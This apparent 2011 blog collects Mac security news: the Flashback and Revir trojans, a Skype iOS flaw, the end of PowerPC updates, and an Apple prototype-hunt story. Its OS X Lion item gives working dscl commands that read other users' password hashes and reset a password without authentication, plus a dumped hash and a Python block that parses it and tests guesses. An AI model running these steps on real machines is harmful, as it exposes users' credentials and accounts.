Tuesday, September 27, 2011

Mac trojan pretends to be Flash Player Installer to get in the door

from arstechnica.com
It's funny because it's Flash

Hot on the heels of last week's Mac malware posing as a PDF is a new piece of malware posing as something even more insidious: a Flash player installer. Security firm Intego was the first to post about the new malware on its blog, noting that although the company has only received one report so far from a user who downloaded it, the malware does exist in the wild and may trick Mac users who don't yet have Flash installed.

The malware in question is a trojan horse called Flashback (OSX/flashback.A); users may end up acquiring it by clicking a link on a malicious website to download or install Flash player. If those users also have their Safari settings to automatically open safe files (which .pkg and .mkpg files are considered to be), an installer will show up on their desktops as if they are legitimately installing Flash.

Continuing through the installation process will result in the trojan deactivating certain types of security software (Intego specifically noted that the popular Little Snitch would be affected) and installing a dynamic loader library (dyld) that can auto-launch, "allowing it to inject code into applications the user launched." The trojan then reports back to a remote server with the user's MAC address, which allows the server to detect whether the Mac in question has been infected or not.

The threat is currently marked as "low," but Mac users are advised to follow safe security practices—don't open files or attachments that you don't remember downloading, and turn off Safari's setting for opening safe files automatically. It's also worth noting that Apple now updates its malware definition file on a daily basis, and has already updated it to address the PDF trojan discussed last week. If you haven't already scoured the Internet for a malicious version of the Flash installer, then it's likely Apple will have added the new malware to the file by the time you run into it.

Sunday, September 25, 2011

New Mac Trojan Found Disguised as PDF File

"Then, Lancelot, Galahad and I jump OUT of the rabbit..."

Summary: A newly discovered Mac vulnerability disguises itself as a PDF to trick users into opening it, which installs an Apache server on your Mac. Luckily it hasn’t been weaponized. Yet.

Just when you thought that it was safe to start using your Mac again comes a report that a new PDF vulnerability may be targeting Mac users.

Fellow ZDNet blogger Ryan Naraine brings the news via his Zero Day blog, that the malware, Trojan-Dropper:OSX/Revir.A “installs downloader component that downloads a backdoor program onto the system, while camouflaging its activity by opening a PDF file to distract the user.”

F-Secure notes that the vulnerability disguises itself as an Adobe Acrobat (PDF) file in an effort to trick users into opening it, which of course, triggers its payload. It even opens a bogus Chinese-language PDF in order to deceive the user and avoid detection. The payload, Backdoor:OSX/Imuler.A according to F-Secure, then runs in the background.

The good news, I suppose, is that Revir.A is fairly innocuous at this point. The payload is a bare Apache installation that is “not capable of communicating with the backdoor yet.” The going theory is that the author may have leaked it to see if any of the antivirus detectors picked it up. Luckily, someone did.

It’s important for Apple to act swiftly on this one. From the looks of things Revir.A probably wouldn’t be too hard to weaponize and we’re not sure how many people might already have the source code.

Apple: you’re on the clock.

MD5 hashes for the samples:

• Trojan-Dropper:OSX/Revir.A: fe4aefe0a416192a1a6916f8fc1ce484
• Trojan-Downloader:OSX/Revir.A: dfda0ddd62ac6089c6a35ed144ab528e
• Backdoor:OSX/Imuler.A: 22b1af87dc75a69804bcfe3f230d8c9d

Friday, September 23, 2011

Apple iPhone Contacts Hacked Through Simple Message

from SmartOffice.com

The dedicated Skype application native to Apple’s iPods and iPhones enables attackers to steal contact information by simply sending a malicious message.
Security researcher Phil Purviance warned Skype about the vulnerability on August 24th and shared his findings with the public on September 19th, according to an SMH report. By exploiting the vulnerability, Skype friends can send a text message harbouring malicious code to a target and steal their entire address book.

By simply viewing the message the victim's address book will be uploaded behind the scenes, oblivious that a hack is taking place on their beloved phone.

Taking to Twitter, Purviance said Skype was working to release an update that would patch the hole sometime this month. The publisher of Skype's website recognised the issue and said they're "working hard" on a fix, which they hope "to roll out imminently."

"In the meantime we always recommend people exercise caution in only accepting friend requests from people they know and practice common sense internet security as always."

Purviance noted that the vulnerability affects Skype version 3.0.1 and its earlier releases. On YouTube, he posted a proof of concept video documenting an exploit of the software vulnerability.

While this is mostly Skype's problem, you would think that Apple's strict team of brilliant app inspectors would have been able to identify this before it got out. Guess not.

Sunday, September 18, 2011

Apple Makes Cracking OS X Lion Passwords Easier Than Ever

from DefenseIndepth
You are now root!
In 2009 I posted an article on Cracking Mac OS X passwords. Whilst this post has been quite popular, it was written for OS X 10.6 and prior. Since the release of Mac OS X Lion (10.7) in July, I have received numerous requests for an update. Typically, I would have just updated the existing article without the need for a new post. However, during my research I discovered something interesting about OS X Lion that I'd like to share.

In previous versions of OS X (10.6, 10.5, 10.4) the process to extract user password hashes has been the same: obtain the user's GeneratedUID and then use that ID to extract hashes from a specific user's shadow file (See my previous post for a more detailed description).

When it comes to Lion, the general premise is the same (albeit a few technical differences). Each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is one that can only be accessed by users with a high privilege (typically root). So for all modern OS X platforms (Tiger, Leopard, Snow Leopard and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user… or at least it should be.

It appears in the redesign of OS X Lion's authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.

If we invoke a directory services listing on user bob by specifying the /Local/ path we can see bob's standard profile information:

$ dscl localhost -read /Local/Default/Users/bob

This provides us with nothing too exciting. However, if we invoke the directory services listing using the /Search/ path, we see a different result:

$ dscl localhost -read /Search/Users/bob

From the output, we can see the following data:


62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f104474911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060

Note: The SHA512 hash is stored from bytes 32-96 and the salt is stored from bytes 28-31. For more information on these hashes please see this thread.

This ShadowHashData attribute actually contains the same hash stored in user bob's shadow .plist file. The interesting thing about this? root privileges are not required. All users on the system, regardless of privilege, have the ability to access the ShadowHashData attribute from any other user's profile.

Due to Lion's relatively short time on the market, I am yet to find any of the major crackers supporting OS X Lion hashes (SHA512 + 4-byte salt). To simplify the cracking of these hashes I have created a simple python script which can be downloaded here.
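As an added example (not the post's own script, and not Apple's code), the Python below decodes the ShadowHashData blob printed above with the standard library: it is a binary plist holding one SALTED-SHA512 entry of 68 bytes, 4 bytes of salt followed by the 64-byte SHA-512, and verify_password shows the single-round SHA-512(salt || password) check Lion performs. Because bob's password is not on the page, make_shadow_hash_data builds a blob for a constructed known password so the round trip can be exercised.

```python
import hashlib
import hmac
import plistlib

# ShadowHashData for user "bob" exactly as printed by dscl in the post above
# (hex with the spaces removed). It is a binary plist: "bplist00", one dict
# entry keyed "SALTED-SHA512", whose value is 4 bytes of salt + 64 bytes of SHA-512.
BOB_SHADOW_HASH_DATA_HEX = (
    "62706c6973743030d101025d53414c5445442d5348413531324f104474911f72"
    "3bd2f66a3255e0af4b85c639776d510b63f0b939c432ab6e082286c47586f19b"
    "4e2f3aab74229ae124ccb11e916a7a1c9b29c64bd6b0fd6cbd22e7b1f0ba1673"
    "080b190000000000000101000000000000000300000000000000000000000000"
    "000060"
)

SALT_LEN, DIGEST_LEN = 4, hashlib.sha512().digest_size  # 4 and 64


def parse_shadow_hash_data(hex_blob: str):
    """Decode a ShadowHashData value into (algorithm, salt, digest)."""
    blob = bytes.fromhex(hex_blob.replace(" ", ""))
    plist = plistlib.loads(blob)  # the stdlib handles the bplist00 container
    if len(plist) != 1:
        raise ValueError(f"expected one hash entry, found {sorted(plist)}")
    (algorithm, data), = plist.items()
    if algorithm != "SALTED-SHA512" or len(data) != SALT_LEN + DIGEST_LEN:
        raise ValueError(f"unexpected format {algorithm!r}, {len(data)} bytes")
    return algorithm, data[:SALT_LEN], data[SALT_LEN:]


def verify_password(salt: bytes, digest: bytes, candidate: str) -> bool:
    """The check Lion itself performs: one SHA-512 over salt || password.
    There is no iteration count, so each guess costs a single hash, which is
    why letting every local user read this attribute matters."""
    guess = hashlib.sha512(salt + candidate.encode("utf-8")).digest()
    return hmac.compare_digest(guess, digest)


def make_shadow_hash_data(password: str, salt: bytes) -> bytes:
    """Build a Lion-style blob for a known password (constructed test data;
    bob's real password is not known, so his blob cannot be verified here)."""
    digest = hashlib.sha512(salt + password.encode("utf-8")).digest()
    return plistlib.dumps({"SALTED-SHA512": salt + digest}, fmt=plistlib.FMT_BINARY)


if __name__ == "__main__":
    algorithm, salt, digest = parse_shadow_hash_data(BOB_SHADOW_HASH_DATA_HEX)
    print(algorithm, "salt =", salt.hex(), "sha512 =", digest.hex())
    # The salt sits at bytes 28-31 of the raw blob, as the post's note says.
    assert bytes.fromhex(BOB_SHADOW_HASH_DATA_HEX)[28:32] == salt
    demo = make_shadow_hash_data("correct horse", bytes.fromhex("deadbeef"))
    _, s, d = parse_shadow_hash_data(demo.hex())
    print("constructed blob verifies:", verify_password(s, d, "correct horse"))
```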

Now, if the password is not found by the dictionary file you're out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user. So, in order to change the password of the currently logged in user, simply use:

$ dscl localhost -passwd /Search/Users/bob

And voila! You will be prompted to enter a new password without the need to authenticate.

Thanks Apple.

Wednesday, September 14, 2011

Apple discontinues security updates for old Macs

from GMANews.com

Sad little Mac
Owners of Apple computers five or more years old, be warned: you're on your own, security-wise.

This was the warning aired by a security researcher who said Apple stopped releasing security updates for Macs with PowerPC G4 or G5 processors.

"Macs purchased as recently as 5 years ago are now left exposed to known security vulnerabilities," researcher Joshua Long said in a blog post .

"Apple should consider supporting Mac hardware for at least a few years longer than it has been in recent years. If Apple had chosen to support the last generation of G4/G5 Macs with Snow Leopard, and the first-generation Intel Core Solo/Duo Macs with Lion, it would have added an additional two years onto the life cycle of each hardware platform. For many Apple customers, having to throw away their hardware and spend $1,000 or more on a new computer every 5 or 6 years (or risk being exposed to security exploits) is not a very reasonable solution," he added.

He also noted Apple's latest security update to counter the rogue security certificates recently issued by DigiNotar did not cover such Macs.

Apple's Security Update 2011-005 fixes the problem only on Mac OS X v10.6 "Snow Leopard" and Mac OS X v10.7 "Lion," both of which can only run on Intel-based Macs.

Since January 2006, Apple has transitioned from using the PowerPC to Intel processors.

"Until (last weekend), Apple had been releasing security updates for Mac OS X v10.5 Leopard, the final version of the Mac operating system that is compatible with G4 and G5 processors. Prior to Apple's transition to the Intel architecture in 2006, all Macs had been based on the IBM/Motorola PowerPC G4 and G5 processors," Long noted.

He said that while the machines bought in 2006 are still expected to run well, they have been cut off from getting security updates from Apple.

"This poses a problem for some businesses and consumers who were not expecting to have to spend thousands of dollars on new hardware this year; note that the Xserve and Power Macintosh G5 in particular were high-end hardware and the most expensive models," he said.

Long said this may also impact on businesses that bought many Macs before the Intel transition, and even on schools with computer labs with iMacs purchased at the beginning of the 2005 school year.

On the other hand, he said Apple has a history of only releasing security updates for the most recent and one previous major release of its Mac OS X operating system - in this case, Lion and Snow Leopard, respectively.

Forced shift to Windows?

Long pointed out the cost of replacing all of the six-year-old computers at once may be particularly burdensome due to economic factors including budget cuts in education.

"If they cannot afford to buy that many new Macs this year, they may be forced to seek alternative solutions such as replacing their Macs with sub-$400 Windows PCs," he said.

Safari updates not enough

Long also said it is not enough to issue security updates for Apple's Safari browser and QuickTime media player to make Leopard and earlier OS X versions safe and secure.

"Since Apple is not releasing updates for the operating system itself, whenever new vulnerabilities are discovered that affect the core of Leopard, Apple will do nothing to help protect Leopard users from these vulnerabilities," he said.

Adobe Flash update problems

Long also warned users of Leopard on PowerPC-based Macs that Adobe stopped releasing Flash Player updates for PowerPC in February 2011.

He said this makes PowerPC Mac users vulnerable to Flash vulnerabilities that have been widely exploited in the wild.

Manual remedies

At least for now, Long said G4 and G5 users running Leopard can hold out on buying an Intel-based Mac for a bit longer if absolutely necessary, if they manually implement a few security tweaks.

He advised them to:

  1. manually delete the DigiNotar Root CA from their systems
  2. disable Java in all browsers
  3. uninstall Flash Player

"If Flash is absolutely necessary for a few trusted sites, users can install the insecure final version of Flash Player 10.1 ... and block Flash content by default using a browser add-on," he said.

Another alternative is to try using the latest release of Ubuntu Linux for PowerPC as an alternative to Leopard.

However, Long said those who try Ubuntu for PPC will likely be disappointed by the limited PowerPC support from third-party Linux software developers.

Microsoft to continue security for WinXP

Meanwhile, Long noted Microsoft will continue to offer security updates for Windows XP, the first version of which was released in 2001, until April 2014.

"At first glance, this makes Apple's dropping of support for 5-year-old computers look especially bad. However, Microsoft allowed PC manufacturers to sell Windows 7 PCs 'downgraded' to Windows XP (that is, with Windows XP preinstalled) as recently as October 2010, so users who bought Windows XP computers then will only receive updates for their installed operating system for a total of 3.5 years," he said.

He said the major difference is that unlike Mac users, Windows XP users will have the option to reformat their systems and install a newer version of Windows after the April 2014 deadline.

In contrast, PowerPC Mac users have no similar option because their hardware is no longer supported, not just their operating system.

Again, Apple could care less about looking bad. Why would they stop support? If Mac security is so great, it should be easy and cost them very little. I know. To force people who want their products bad enough to shell out even more cash. Cha-ching Apple!

Saturday, September 3, 2011

Apple Investigators Allegedly Posed as Cops in iPhone Prototype Hunt

Above the Law? We ARE the Law
from wired.com
A little more light has been shed on the odd story of Apple losing another iPhone prototype in a Bay Area bar.

The man whose home was searched by what he believed to be San Francisco Police Department officers was Bernal Heights resident Sergio Calderón, SF Weekly discovered. And the police officers? They may have been investigators working for Apple who were actually impersonating police officers.

Impersonating a police officer is a misdemeanor in California, and is punishable by up to a year of jail time. Another option is that Apple was working with police officers, and a proper report was never filed. When the SFPD has been called and asked about the Apple incident, representatives said they had no knowledge of the search.

“This is something that’s going to need to be investigated now,” SFPD spokesman Lt. Troy Dangerfield told SF Weekly. “If this guy is saying that the people said they were SFPD, that’s a big deal.”

On Wednesday CNET News.com reported that in late July an Apple representative lost a “priceless” next generation iPhone prototype in San Francisco bar Cava 22. Apple reportedly used GPS to track the phone to a Bernal Heights area home, where police officers were given permission to search the home for the device. The resident was offered money by Apple for the iPhone’s safe return, but it was not turned in. The phone was sold on Craigslist for $200, according to CNET, but no independent evidence of the post has surfaced.

The incident is reminiscent of what happened last year when an iPhone 4 prototype was left at a Redwood City bar, and purchased for $5,000 by Gizmodo.

Here’s what went down, according to the new report by SF Weekly:

Calderón said that at about 6 p.m. six people — four men and two women — wearing badges of some kind showed up at his door. “They said, ‘Hey, Sergio, we’re from the San Francisco Police Department.’” He said they asked him whether he had been at Cava 22 over the weekend (he had) and told him that they had traced a lost iPhone to his home using GPS.

They did not say they were there on Apple’s behalf, but they said that the “owner of the phone” would offer Calderón $300 for the phone.

Calderón told SF Weekly that he was threatened by the law-enforcement officers when they visited his house, and said that he has no knowledge of the prototype.

One of the officers who visited the Calderón household was a man named “Tony”. He left his phone number with Calderón in case he discovered any information about the lost phone. It turns out the phone number belongs to an ex-cop named Anthony Colon, who apparently now works for Apple. A search on LinkedIn found that Colon works as a special investigator for Apple and is a former San Jose police officer. That page is now removed from the site, but caches can still be viewed.

This tale keeps getting weirder and weirder. Apple hasn’t returned phone calls on the matter from Wired.com.

Yet more illegal and/or immoral activity from the almighty Apple. They'll probably claim that this was the work of someone operating against their orders and "disciplinary action" will be taken with that individual. Yeah, more plausible deniability BS. If this story is verified, Apple needs to face serious charges. Put a few CEOs in prison, that just might open a few eyes.